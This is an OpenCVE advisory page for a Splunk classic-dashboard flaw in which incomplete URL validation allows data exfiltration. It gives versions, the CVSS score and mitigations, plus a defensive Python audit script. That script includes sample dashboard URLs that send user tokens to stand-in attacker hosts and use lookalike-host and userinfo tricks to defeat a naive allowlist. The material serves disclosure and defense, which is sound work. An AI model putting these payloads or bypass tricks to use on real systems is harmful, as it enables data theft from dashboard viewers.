Description
In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a malicious classic dashboard that exfiltrates sensitive data to an external server.

The vulnerability exists because URL validation on the external content dialog is incomplete, which can allow for requests to untrusted domains when a user interacts with a crafted dashboard.
Published: 2026-06-10
Score: 5.7 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A low‑privileged user of Splunk Enterprise or Splunk Cloud Platform can craft a classic dashboard that causes requests to external domains when another user interacts with it. The flaw is incomplete URL validation in the external content dialog, the prompt that is supposed to gate a dashboard's requests to untrusted domains, so a URL that should be blocked or flagged can get through. The result is exfiltration of sensitive data to an attacker‑controlled server: a confidentiality compromise, with no integrity or availability impact.

Affected Systems

The vulnerability affects Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12 and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23 and 9.3.2411.132. The attacker needs only a low‑privileged account, one that does not hold the admin or power role but can create a classic dashboard. Any user who opens and interacts with the crafted dashboard is a potential victim.

Risk and Exploitability

The CVSS 3.1 base score is 5.7 (Medium), vector AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N: reachable over the network with low attack complexity and low privileges, but it requires user interaction, and the impact is limited to confidentiality. EPSS data is not available, and the vulnerability is not listed in CISA KEV. The attack path is a low‑privileged user publishing a crafted classic dashboard in Splunk Web and waiting for another user to open and interact with it, at which point data is sent to an attacker‑controlled external server.

Generated by OpenCVE AI on June 10, 2026 at 19:23 UTC.

Remediation

No separate vendor fix or workaround is recorded in this entry. The description above does name the first fixed releases: Splunk Enterprise 10.2.4, 10.0.7, 9.4.12 and 9.3.13, and Splunk Cloud Platform 10.3.2512.13, 10.2.2510.15, 10.1.2507.23 and 9.3.2411.132.

OpenCVE Recommended Actions

  • Upgrade Splunk Enterprise to the fixed release of the branch you run: 10.2.4, 10.0.7, 9.4.12 or 9.3.13 (or later in that branch). For Splunk Cloud Platform, confirm the instance is on 10.3.2512.13, 10.2.2510.15, 10.1.2507.23 or 9.3.2411.132 or later.
  • Restrict the domains classic dashboards may load external content from to an explicit allowlist (in recent releases this is the dashboards trusted domains list configured in web.conf; confirm the setting name in your release's web.conf.spec), and review dashboards created by users without the admin or power roles for references to hosts outside that list. Treat this as defense in depth, not a fix: the validation that enforces the allowlist is the component this CVE describes as incomplete.
  • Apply network or firewall rules that block outbound traffic to untrusted external domains. Because the external content dialog is part of Splunk Web, the request is most likely issued by the browser of the user viewing the dashboard rather than by the Splunk servers, so egress filtering on the Splunk hosts alone does not cover it; apply it at the egress of the networks Splunk Web users browse from as well.
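The second and third actions come down to one decision: does a URL a dashboard references point at a trusted host? That decision is where incomplete validation bites. The script below is an added example, not Splunk's code and not the check behind this CVE: it walks a classic (SimpleXML) dashboard, pulls out every absolute or protocol‑relative URL, and compares a naive substring allowlist check against a strict one that parses the URL and matches the host exactly. The dashboard XML, the allowlist (cdn.example.com) and the attacker hosts (attacker.example) are constructed for the example; the element names follow the SimpleXML layout (row, panel, html, drilldown/link) and the tokens are ordinary SimpleXML tokens.

```python
"""Audit a classic (SimpleXML) dashboard for URLs that point outside an allowlist.

Added example, not Splunk's code. Element names follow the SimpleXML layout
(<dashboard>, <row>, <panel>, <html>, <drilldown>/<link>); the dashboard,
the allowlist and the attacker host names are constructed for this example.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed allowlist: the only host the dashboard is allowed to talk to.
ALLOWED_HOSTS = {"cdn.example.com"}

# Constructed dashboard. One <img> loads a legitimate asset; the other <img>,
# the <a> and the drilldown <link> carry tokens ($env:user$, $click.value$)
# to hosts that merely contain the trusted name as a substring.
SAMPLE_DASHBOARD = """<dashboard>
  <label>Quarterly review</label>
  <row>
    <panel>
      <html>
        <img src="https://cdn.example.com/logo.png"/>
        <img src="https://cdn.example.com.attacker.example/pixel.gif?u=$env:user$"/>
        <a href="https://cdn.example.com@collector.attacker.example/x">report</a>
      </html>
    </panel>
    <panel>
      <table>
        <search><query>index=_internal | head 10</query></search>
        <drilldown>
          <link target="_blank">https://collector.attacker.example/?q=$click.value$</link>
        </drilldown>
      </table>
    </panel>
  </row>
</dashboard>
"""

# Absolute http(s) URLs and protocol-relative ones (//host/...), ending at
# whitespace, a quote or an angle bracket.
URL_RE = re.compile(r"""(?:https?:)?//[^\s"'<>]+""", re.IGNORECASE)


def extract_urls(xml_text):
    """Return every URL found in attributes or text of the dashboard, in document order."""
    root = ET.fromstring(xml_text)
    urls = []
    for element in root.iter():
        chunks = list(element.attrib.values())
        chunks.extend(s for s in (element.text, element.tail) if s)
        for chunk in chunks:
            urls.extend(URL_RE.findall(chunk))
    return urls


def naive_is_trusted(url):
    """Substring match on the raw string: the kind of incomplete check that
    accepts look-alike hosts and userinfo tricks. Shown only as the weak form."""
    return any(host in url for host in ALLOWED_HOSTS)


def strict_is_trusted(url):
    """Parse first, then compare the exact host name.

    Rejects anything that is not https, anything carrying userinfo
    (https://trusted@evil), protocol-relative URLs (no scheme) and hosts that
    only end with or contain the trusted name.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() != "https":
        return False
    if parts.username is not None or parts.password is not None:
        return False
    host = (parts.hostname or "").rstrip(".").lower()
    return host in ALLOWED_HOSTS


def audit_dashboard(xml_text, is_trusted=strict_is_trusted):
    """Return the URLs in the dashboard that the given check does not trust."""
    return [url for url in extract_urls(xml_text) if not is_trusted(url)]


if __name__ == "__main__":
    for url in extract_urls(SAMPLE_DASHBOARD):
        print(f"naive={naive_is_trusted(url)!s:5} strict={strict_is_trusted(url)!s:5} {url}")
```

Run it over the view XML files of an app (the views directories under default and local) to list every external reference that the strict check rejects. The host comparison is the part worth keeping: matching the trusted name as a substring or prefix of the raw string accepts cdn.example.com.attacker.example and cdn.example.com@collector.attacker.example, both of which a browser resolves to the attacker's host, while parsing and comparing the exact host name rejects them.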

Advisories

No advisories yet.

History

Wed, 10 Jun 2026 21:15:00 +0000

Type                 Values Removed    Values Added
First Time appeared                    Splunk
                                       Splunk splunk Cloud Platform
                                       Splunk splunk Enterprise
Vendors & Products                     Splunk
                                       Splunk splunk Cloud Platform
                                       Splunk splunk Enterprise

Wed, 10 Jun 2026 18:15:00 +0000

Type          Values Removed    Values Added
Description                     In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a malicious classic dashboard that exfiltrates sensitive data to an external server. The vulnerability exists because URL validation on the external content dialog is incomplete, which can allow for requests to untrusted domains when a user interacts with a crafted dashboard.
Title                           Improper Input Validation through Classic Dashboards in Splunk Enterprise
Weaknesses                      CWE-20
References
Metrics                         cvssV3_1 {'score': 5.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}


MITRE

Status: PUBLISHED

Assigner: cisco

Published:

Updated: 2026-06-10T18:25:12.492Z

Reserved: 2025-10-08T11:59:15.401Z

Link: CVE-2026-20255

Vulnrichment

No data.

NVD

Status : Undergoing Analysis

Published: 2026-06-10T18:16:41.010

Modified: 2026-06-10T18:36:19.463

Link: CVE-2026-20255

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-10T21:00:06Z

Weaknesses